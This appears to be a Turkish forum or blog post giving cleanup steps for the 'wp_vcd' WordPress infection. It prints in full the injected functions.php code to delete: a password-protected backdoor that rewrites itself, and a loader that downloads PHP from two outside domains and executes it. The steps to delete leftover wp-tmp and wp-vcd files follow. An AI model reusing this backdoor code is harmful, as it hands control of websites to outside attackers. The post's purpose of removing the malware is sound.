functions.php'den tüm aşağıdaki kodları silin
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '475b713dbdf25d7dd4c8d5921ded83bc'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = <span class="userTag">@file_get_contents\("</span>http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
<span class="userTag">@file_put_contents(__FILE__, $file);</span>
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
<span class="userTag">@file_put_contents(__FILE__, $file);</span>
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='08b370e35d008b6591dd40b0eec23025';
if (($tmpcontent = <span class="userTag">@file_get_contents("</span>http://www.zanons.com/code.php") OR $tmpcontent = <span class="userTag">@file_get_contents_tcurl("</span>http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
<span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span>
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
<span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span>
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
<span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span>
}
}
}
}
elseif ($tmpcontent = <span class="userTag">@file_get_contents("</span>http://www.zanons.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
<span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span>
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
<span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span>
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
<span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span>
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>Sonra:
Wp-includes'un içinden wp-tmp, wp-vcd ve wp-feed i tamamen silin.
Sonra:
wp-includes'un içindeki wp-post'un içine girip en ustte çıkan wp-tmp ya da wp-vcd ile alakalı php kodu silin. en ustte hemen goreceksiniz...
404 js malware hatası gibi bir şey kalacak sucuride. sucuri hata veriyor ama bir sorun yok, tehlikeli değil yani. Google hata vermiyor bu konuda... ama eğer bunu da temizlemek istiyorsanız, wordpress ve tema dosyalarını silip (silmeniz gerekiyor, uzerine yedek atmayın. sildikten sonra isterseniz yedek atabilirsiniz. config dosyasını ve uploads'ı silmeyin) tekrar yuklemeniz gerekecek.